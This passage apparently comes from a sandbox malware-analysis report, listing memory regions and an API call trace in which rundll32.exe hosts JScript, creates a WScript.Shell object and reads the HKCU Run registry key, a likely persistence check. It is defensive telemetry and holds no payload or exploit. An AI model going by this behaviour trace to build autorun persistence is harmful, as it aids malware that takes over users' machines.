0x7feff240000 end_va = 0x7feff291fff entry_point = 0x7feff240000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 876 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 877 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 878 start_va = 0x7fefb860000 end_va = 0x7fefb8b5fff entry_point = 0x7fefb860000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 879 start_va = 0x1f30000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 880 start_va = 0x2060000 end_va = 0x213efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002060000" filename = "" Region: id = 881 start_va = 0x7fefb400000 end_va = 0x7fefb417fff entry_point = 0x7fefb400000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 882 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 883 start_va = 0x21e0000 end_va = 0x25d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021e0000" filename = "" Region: id = 884 start_va = 0x25e0000 end_va = 0x28aefff entry_point = 0x25e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 885 start_va = 0x7fefee10000 end_va = 0x7fefeea8fff entry_point = 0x7fefee10000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 886 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 887 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 888 start_va = 0x7fefc4d0000 end_va = 0x7fefc6c3fff entry_point = 0x7fefc4d0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 889 start_va = 0x2c0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 890 start_va = 0x7fefd890000 end_va = 0x7fefd8b4fff entry_point = 0x7fefd890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 891 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 892 start_va = 0x2f0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 893 start_va = 0x2a90000 end_va = 0x2b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 894 start_va = 0x7fefb090000 end_va = 0x7fefb09dfff entry_point = 0x7fefb090000 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll") Region: id = 895 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 896 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x2d0000 region_type = mapped_file name = "msctf.dll.mui" filename = "\\Windows\\System32\\en-US\\msctf.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctf.dll.mui") Region: id = 897 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 898 start_va = 0x7fef55b0000 end_va = 0x7fef5603fff entry_point = 0x7fef55b0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 899 start_va = 0x330000 end_va = 0x330fff entry_point = 0x330000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 900 start_va = 0x2b80000 end_va = 0x2bfffff entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 901 start_va = 0x7fefd2c0000 end_va = 0x7fefd2d6fff entry_point = 0x7fefd2c0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 902 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 903 start_va = 0x7fefcfc0000 end_va = 0x7fefd006fff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 904 start_va = 0x7fefd9b0000 end_va = 0x7fefd9c3fff entry_point = 0x7fefd9b0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 905 start_va = 0x2cd0000 end_va = 0x2d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 906 start_va = 0x2d50000 end_va = 0x2dcffff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 907 start_va = 0x7fefd8d0000 end_va = 0x7fefd960fff entry_point = 0x7fefd8d0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 908 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 909 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 910 start_va = 0x7fef4900000 end_va = 0x7fef49e2fff entry_point = 0x7fef4900000 region_type = mapped_file name = "jscript.dll" filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll") Region: id = 911 start_va = 0x7fef49f0000 end_va = 0x7fef55a6fff entry_point = 0x7fef49f0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 912 start_va = 0x7fefb060000 end_va = 0x7fefb087fff entry_point = 0x7fefb060000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 913 start_va = 0x7fefacb0000 end_va = 0x7fefacc7fff entry_point = 0x7fefacb0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 914 start_va = 0x7fefde40000 end_va = 0x7fefebc7fff entry_point = 0x7fefde40000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 915 start_va = 0x7fefada0000 end_va = 0x7fefadd3fff entry_point = 0x7fefada0000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 916 start_va = 0x340000 end_va = 0x353fff entry_point = 0x341070 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 917 start_va = 0x2dd0000 end_va = 0x3986fff entry_point = 0x2dd1bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 918 start_va = 0x1ed0000 end_va = 0x1ed1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 919 start_va = 0x3990000 end_va = 0x3a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 920 start_va = 0x340000 end_va = 0x353fff entry_point = 0x341070 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 921 start_va = 0x1ee0000 end_va = 0x1eeffff entry_point = 0x1ee1064 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 922 start_va = 0x1ef0000 end_va = 0x1ef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 923 start_va = 0x7fefc350000 end_va = 0x7fefc47bfff entry_point = 0x7fefc350000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 924 start_va = 0x1f00000 end_va = 0x1f01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f00000" filename = "" Region: id = 925 start_va = 0x1f10000 end_va = 0x1f13fff entry_point = 0x1f10000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 926 start_va = 0x1fb0000 end_va = 0x1fcafff entry_point = 0x1fb0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db") Region: id = 927 start_va = 0x1f20000 end_va = 0x1f20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 928 start_va = 0x3a90000 end_va = 0x3b90fff entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 929 start_va = 0x3a90000 end_va = 0x3b90fff entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 930 start_va = 0x3a90000 end_va = 0x3b90fff entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 931 start_va = 0x7fefd9d0000 end_va = 0x7fefd9defff entry_point = 0x7fefd9d0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 932 start_va = 0x1f10000 end_va = 0x1f13fff entry_point = 0x1f10000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 933 start_va = 0x29b0000 end_va = 0x29dffff entry_point = 0x29b0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db") Region: id = 934 start_va = 0x1fd0000 end_va = 0x1fd3fff entry_point = 0x1fd0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 935 start_va = 0x29e0000 end_va = 0x2a45fff entry_point = 0x29e0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 936 start_va = 0x7fefdd00000 end_va = 0x7fefdd35fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 937 start_va = 0x7fefdd40000 end_va = 0x7fefdd59fff entry_point = 0x7fefdd40000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 938 start_va = 0x7feffba0000 end_va = 0x7feffd76fff entry_point = 0x7feffba0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1239 start_va = 0x3bf0000 end_va = 0x3c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003bf0000" filename = "" Region: id = 1240 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1241 start_va = 0x2c50000 end_va = 0x2ccffff entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 1242 start_va = 0x3c70000 end_va = 0x459ffff entry_point = 0x3c70000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Thread: id = 25 os_tid = 0x678 [0082.120] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d660 | out: lpSystemTimeAsFileTime=0x18d660*(dwLowDateTime=0x94d04ca0, dwHighDateTime=0x1d31a96)) [0082.120] GetCurrentProcessId () returned 0x674 [0082.120] GetCurrentThreadId () returned 0x678 [0082.120] GetTickCount () returned 0x3e66 [0082.120] QueryPerformanceCounter (in: lpPerformanceCount=0x18d668 | out: lpPerformanceCount=0x18d668*=66127711) returned 1 [0082.122] __dllonexit () returned 0x7fef4940728 [0082.122] __dllonexit () returned 0x7fef4940780 [0082.122] __dllonexit () returned 0x7fef4940750 [0082.123] __dllonexit () returned 0x7fef49407b0 [0082.123] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7feff2d0000 [0082.123] GetProcAddress (hModule=0x7feff2d0000, lpProcName="RegisterTraceGuidsA") returned 0x77a9f570 [0082.124] EtwRegisterTraceGuidsA () returned 0x0 [0082.124] EtwRegisterTraceGuidsA () returned 0x0 [0082.124] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d250, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe")) returned 0x20 [0082.124] GetProcAddress (hModule=0x7feff2d0000, lpProcName="RegOpenKeyExA") returned 0x7feff2eb5f0 [0082.124] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x18d3b8 | out: phkResult=0x18d3b8*=0x0) returned 0x2 [0082.127] GetVersion () returned 0x1db10106 [0082.129] GetUserDefaultLCID () returned 0x409 [0082.129] GetACP () returned 0x4e4 [0082.129] GetCurrentThreadId () returned 0x678 [0082.129] GetCurrentThreadId () returned 0x678 [0082.130] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f208 | out: phkResult=0x18f208*=0x1fc) returned 0x0 [0082.130] GetProcAddress (hModule=0x7feff2d0000, lpProcName="RegQueryValueExA") returned 0x7feff2ec480 [0082.130] RegQueryValueExA (in: hKey=0x1fc, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x18f200, lpData=0x18f1f8, lpcbData=0x18f1f0*=0x4 | out: lpType=0x18f200*=0x4, lpData=0x18f1f8*=0x1, lpcbData=0x18f1f0*=0x4) returned 0x0 [0082.130] GetProcAddress (hModule=0x7feff2d0000, lpProcName="RegCloseKey") returned 0x7feff2f0710 [0082.130] RegCloseKey (hKey=0x1fc) returned 0x0 [0082.130] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7feff990000 [0082.130] GetProcAddress (hModule=0x7feff990000, lpProcName="CoGetObjectContext") returned 0x7feff9ac920 [0082.130] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7feff990000 [0082.130] GetProcAddress (hModule=0x7feff990000, lpProcName="CoCreateInstance") returned 0x7feff9b7490 [0082.130] CoCreateInstance (in: rclsid=0x7fef49acba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef49acd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f1d0 | out: ppv=0x18f1d0*=0x7feffb6a1b0) returned 0x0 [0082.131] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x18f190, nSize=0x27 | out: lpBuffer="") returned 0x0 [0082.131] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0082.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f230, cchData=6 | out: lpLCData="1252") returned 5 [0082.131] IsValidCodePage (CodePage=0x4e4) returned 1 [0082.131] CoCreateInstance (in: rclsid=0x7fef49a5d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef49a5d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2eb6e0 | out: ppv=0x2eb6e0*=0x3d87e0) returned 0x0 [0082.131] IUnknown:AddRef (This=0x3d87e0) returned 0x2 [0082.131] GetCurrentProcessId () returned 0x674 [0082.131] GetCurrentThreadId () returned 0x678 [0082.131] GetTickCount () returned 0x3e76 [0082.131] ISystemDebugEventFire:BeginSession (This=0x3d87e0, guidSourceID=0x7fef49a5da8, strSessionName="JScript:00001652:00001656:18015990") returned 0x0 [0082.132] GetCurrentThreadId () returned 0x678 [0082.132] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f1d0 | out: ppv=0x18f1d0*=0x39ac80) returned 0x0 [0082.134] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7feffb6a1b0, pUnk=0x2ebdc0, riid=0x7fef49a6340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x2ebdf8 | out: pdwCookie=0x2ebdf8*=0x100) returned 0x0 [0082.135] IUnknown:QueryInterface (in: This=0x2ebdc0, riid=0x7feffb3d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f008 | out: ppvObject=0x18f008*=0x0) returned 0x80004002 [0082.135] IUnknown:QueryInterface (in: This=0x2ebdc0, riid=0x7feffb16f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f010 | out: ppvObject=0x18f010*=0x0) returned 0x80004002 [0082.135] IUnknown:AddRef (This=0x2ebdc0) returned 0x2 [0082.135] IUnknown:AddRef (This=0x39ac80) returned 0x2 [0082.135] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.135] GetTickCount () returned 0x3e76 [0082.135] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f190 | out: ppv=0x18f190*=0x39ac80) returned 0x0 [0082.135] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.135] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f190 | out: ppv=0x18f190*=0x39ac80) returned 0x0 [0082.135] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.136] GetCurrentThreadId () returned 0x678 [0082.139] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f2d8 | out: ppv=0x18f2d8*=0x39ac80) returned 0x0 [0082.140] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.140] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f328 | out: ppv=0x18f328*=0x39ac80) returned 0x0 [0082.140] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.140] ISystemDebugEventFire:IsActive (This=0x3d87e0) returned 0x1 [0082.140] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f2c8 | out: ppv=0x18f2c8*=0x39ac80) returned 0x0 [0082.140] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.140] GetCurrentThreadId () returned 0x678 [0082.142] GetCurrentThreadId () returned 0x678 [0082.185] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7feff990000 [0082.185] GetProcAddress (hModule=0x7feff990000, lpProcName="CLSIDFromProgIDEx") returned 0x7feff9aa4c4 [0082.185] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x18d360 | out: lpclsid=0x18d360*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0082.188] SysStringLen (param_1=0x0) returned 0x0 [0082.188] GetProcAddress (hModule=0x7feff990000, lpProcName="CoGetClassObject") returned 0x7feff9c2e18 [0082.188] CoGetClassObject (in: rclsid=0x18d360*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef49a6300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18d330 | out: ppv=0x18d330*=0x2ee090) returned 0x0 [0082.770] WshShell:IUnknown:QueryInterface (in: This=0x2ee090, riid=0x7fef49a6310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18d338 | out: ppvObject=0x18d338*=0x0) returned 0x80004002 [0082.770] WshShell:IClassFactory:CreateInstance (in: This=0x2ee090, pUnkOuter=0x0, riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18d320 | out: ppvObject=0x18d320*=0x2ee0d8) returned 0x0 [0082.770] WshShell:IUnknown:Release (This=0x2ee090) returned 0x0 [0082.770] IUnknown:QueryInterface (in: This=0x2ee0d8, riid=0x7fef49a6320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x18d300 | out: ppvObject=0x18d300*=0x0) returned 0x80004002 [0082.770] IUnknown:QueryInterface (in: This=0x2ee0d8, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18d2d8 | out: ppvObject=0x18d2d8*=0x0) returned 0x80004002 [0082.770] IUnknown:QueryInterface (in: This=0x2ee0d8, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18d250 | out: ppvObject=0x18d250*=0x0) returned 0x80004002 [0082.770] IUnknown:QueryInterface (in: This=0x2ee0d8, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18d258 | out: ppvObject=0x18d258*=0x0) returned 0x80004002 [0082.770] IUnknown:QueryInterface (in: This=0x2ee0d8, riid=0x7fef49a6508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x18d260 | out: ppvObject=0x18d260*=0x0) returned 0x80004002 [0082.770] IUnknown:QueryInterface (in: This=0x2ee0d8, riid=0x7fef49a6340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18d268 | out: ppvObject=0x18d268*=0x2ee0b0) returned 0x0 [0082.770] IUnknown:Release (This=0x2ee0d8) returned 0x1 [0082.770] IDispatch:GetIDsOfNames (in: This=0x2ee0b0, riid=0x7fef49a6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18d600*="RegRead", cNames=0x1, lcid=0x409, rgDispId=0x18d4b0 | out: rgDispId=0x18d4b0*=2000) returned 0x0 [0082.815] IUnknown:AddRef (This=0x2ee0b0) returned 0x2 [0082.815] IDispatch:Invoke (in: This=0x2ee0b0, dispIdMember=2000, riid=0x7fef49a6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x18d398*(rgvarg=([0]=0x18d3b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HKCU\\software\\microsoft\\windows\\currentversion\\run\\", varVal2=0x2eda70)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18d8d8, pExcepInfo=0x18d340, puArgErr=0x18d334 | out: pDispParams=0x18d398*(rgvarg=([0]=0x18d3b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HKCU\\software\\microsoft\\windows\\currentversion\\run\\", varVal2=0x2eda70)), rgdispidNamedArgs=0x0, cArgs=0x1, 